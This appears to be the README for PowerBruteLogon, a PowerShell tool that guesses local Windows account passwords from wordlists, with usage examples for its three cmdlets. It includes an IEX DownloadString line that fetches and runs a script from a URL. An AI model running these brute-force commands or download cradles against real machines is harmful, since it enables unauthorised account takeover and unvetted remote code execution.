PowerBruteLogon is a ported version of WinBruteLogon in pure PowerShell
You might find useful information about the technique used in this PoC here
You can use this PowerShell Application whether as a PowerShell Script or as a PowerShell Module.
To be available, the module must first be present in a registered module path.
You can list module paths with following command:
Write-Output $env:PSModulePathExample Output:
C:\Users\Phrozen\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
Copy the module file <module_name>.psm1 to desired module path.
You can use bellow command to check if your module was successfully imported:
Get-Module -ListAvailableExample Output:
PS C:\Users\Phrozen\Desktop> Get-Module -ListAvailable
Directory: C:\Users\Phrozen\Documents\WindowsPowerShell\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest <version> <module_name> <available_exported_commands>
<..snip..>
If you don't see them, run the following commands and check back.
Import-Module <module_name>
Import-Module <module_name>It is not mandatory to install this application as a PowerShell module (Even if file extension is *.psm1)
You can also load it as a PowerShell Script. Multiple methods exists including:
Invoking Commands Using:
IEX (Get-Content .\<module_name>.psm1 -Raw)Loading script from a remote location:
IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/<module_name>.psm1')Invoke-BruteLogonAccount
Invoke-BruteLogonList
Invoke-BruteAvailableLogonsAttempt to recover the password of a single defined Windows User Account.
| Parameter | Type | Default | Description |
|---|---|---|---|
| Username (*) | String | None | Target Microsoft Windows local user account |
| WordList (*) | String | None | Text file location containing password candidates |
* = Mandatory Options
Invoke-BruteLogonAccount -Username "darkcodersc" -Wordlist "C:\Temp\Wordlist.txt"`
Attempt to recover the password of a list of Windows User Account.
| Parameter | Type | Default | Description |
|---|---|---|---|
| UserList (*) | String | None | Text file location containing user candidates |
| WordList (*) | String | None | Text file location containing password candidates |
* = Mandatory Options
Invoke-BruteLogonList -UserList "C:\Temp\users.txt" -WordList "C:\Temp\Wordlist.txt"
Attempt to recover the password of all available local Windows User Accounts.
| Parameter | Type | Default | Description |
|---|---|---|---|
| IgnoreUsers | Array Of String | None | A list of usernames to ignore |
| WordList (*) | String | None | Text file location containing password candidates |
* = Mandatory Options
Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt"
Invoke-BruteAvailableLogons -WordList "C:\Temp\Wordlist.txt" -IgnoreUsers "Phrozen"
PowerBruteLogon supports account lockout detection. When account lockout is configured on Windows (
You will see the following message printed on screen:
You might find the PowerShell progressbar ennoying, for this reason you might want to remove bellow code:
# Display Progress / Stats
$perc = [math]::Round((100 * $currPos) / $candidateCount)
$activity = [string]::Format("Testing candidate ""{0}"" for username ""{1}""", $candidate, $targetUser)
$status = [string]::Format("$perc% Complete:{0}/{1}", $currPos, $candidateCount)
Write-Progress -Activity $activity -Status $status -PercentComplete $percMade with ❤️ in 🇫🇷